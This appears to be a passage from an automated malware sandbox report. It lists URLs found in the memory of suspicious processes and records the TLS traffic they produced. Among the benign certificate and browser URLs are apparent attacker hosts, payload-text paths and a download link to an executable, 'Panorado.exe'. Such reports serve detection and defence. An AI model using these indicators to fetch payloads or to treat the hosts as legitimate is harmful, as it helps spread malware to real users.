                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000000.1281744220.0000000000BC5000.00000002.00000001.01000000.00000009.sdmp, electronics.exe, 00000043.00000000.2223887416.0000000000345000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS0
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.entrust.net/rpa03
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/licenses/lgpl-2.1.htmlF
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.com/SHSetUnreadMailCountW
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi/DeleteMessages
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi/GetMessage
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi/GetMetadata
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.hotmail.msn.com/ws/2004/09/oim/rsi/UpdateReadState
                Source: msn.exe, 00000027.00000002.2156116548.00000000096F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.inkscape.org/)
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.inkscape.org/namespaces/inkscape
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.macromedia.com/go/getflashplayer/
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.msn.com/webservices/spaces/v1/
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.msn.com/webservices/spaces/v1/GetXmlFeed
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.msn.com/webservices/spaces/v1/GetXmlFeedLouserzedConfig/ContactCard/GetXmlFeedRpsUrl
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                Source: Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Palestine.com, 00000011.00000003.1561893686.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1909570863.0000000004468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000021.00000002.2261102876.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://asuslogservice.azurewebsites.net/api/get_sas_token?code=
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://asuslogservicestorage.blob.core.windows.net/log-pool/
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&cta
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://certs.securetrust.com/CA0
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://certs.securetrust.com/CA05
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://certs.securetrust.com/CA0:
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pesterd
                Source: Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Palestine.com, 00000011.00000003.1729130091.0000000006BED000.00000004.00000800.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000000.2019186157.0000000000591000.00000020.00000001.01000000.0000000D.sdmp, V2DDYDPIWYUTCJYUB0IV5.exe, 00000044.00000000.2346752958.0000000000CB7000.00000020.00000001.01000000.00000016.sdmp | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                Source: Palestine.com, 00000011.00000002.2039631031.00000000048BC000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1992606677.00000000048B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliplorihoe0.shop/
                Source: Palestine.com, 00000011.00000002.2039631031.00000000048BC000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1992606677.00000000048B9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.0000000004307000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.2311177794.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2406753168.0000000004438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txt
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txt(
                Source: Palestine.com, 0000001F.00000002.2387321620.00000000015DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txtV
                Source: Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kliplorihoe0.shop:443/int_clp_ldr_pan.txt1
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliptedehoa.shop
                Source: powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://kliptedehoa.shop/int_clp_pan.txt
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: https://loginnet.passport.com
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: https://nexus.passport.com/rdr/pprdr.asp
                Source: powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: https://ows.messenger.msn.com/OimWS/oim.asmx
                Source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | String found in binary or memory: https://rsi.hotmail.com/rsi/rsi.asmx
                Source: Palestine.com, 00000011.00000002.2036575036.0000000004760000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://shearhoaxx.click/
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BF000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1560361265.00000000048B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://shearhoaxx.click/K
                Source: Palestine.com, 0000001F.00000002.2389704146.0000000001610000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://shearhoaxx.click/api
                Source: Palestine.com, 00000011.00000002.2040719422.0000000004A37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://shearhoaxx.click/api)5
                Source: Palestine.com, 0000001F.00000002.2389704146.0000000001610000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://shearhoaxx.click/api.
                Source: Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://shearhoaxx.click:443/api
                Source: Palestine.com, 00000011.00000002.2023662646.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://shearhoaxx.click:443/apiges
                Source: Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://shearhoaxx.click:443/apitxtPK
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.0000000004307000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://slotwang.com/
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://slotwang.com/3
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://slotwang.com/I
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://slotwang.com/file/Panorado.exe
                Source: Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://slotwang.com/file/Panorado.exeo%
                Source: Palestine.com, 0000001F.00000002.2399867318.0000000004307000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://slotwang.com/tLA
                Source: Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://slotwang.com:443/file/Panorado.exe
                Source: Palestine.com, 00000011.00000002.2023662646.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://slotwang.com:443/file/Panorado.exean.txt
                Source: Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.trustwave.com/CA03
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03
                Source: Palestine.com, 00000011.00000003.1466749906.000000000515C000.00000004.00000800.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.certum.pl/CPS0
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.entrust.net/rpa0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/06
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2033628807.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2023868066.00000000030FF000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000000.2044954076.0000000000CF1000.00000020.00000001.01000000.0000000F.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000000.2081536277.0000000000C3D000.00000020.00000001.01000000.00000013.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000000.2365650084.000000000051D000.00000020.00000001.01000000.00000017.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000000.2427066699.000000000116D000.00000020.00000001.01000000.00000018.sdmp | String found in binary or memory: https://www.innosetup.com/
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000090C5000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.openssl.org/H
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2033628807.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2023868066.00000000030FF000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000000.2044954076.0000000000CF1000.00000020.00000001.01000000.0000000F.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000000.2081536277.0000000000C3D000.00000020.00000001.01000000.00000013.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000000.2365650084.000000000051D000.00000020.00000001.01000000.00000017.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000000.2427066699.000000000116D000.00000020.00000001.01000000.00000018.sdmp | String found in binary or memory: https://www.remobjects.com/ps
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49701 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49704 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49705 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.182.135:443 -> 192.168.2.16:49709 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 45.66.248.134:443 -> 192.168.2.16:49710 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.35.89:443 -> 192.168.2.16:49711 version: TLS 1.2
                Source: msn.exe, 00000027.00000002.2194406333.0000000059101000.00000020.00000001.01000000.00000010.sdmp | Binary or memory string: DirectDrawCreateExmemstr_e6d5f626-8
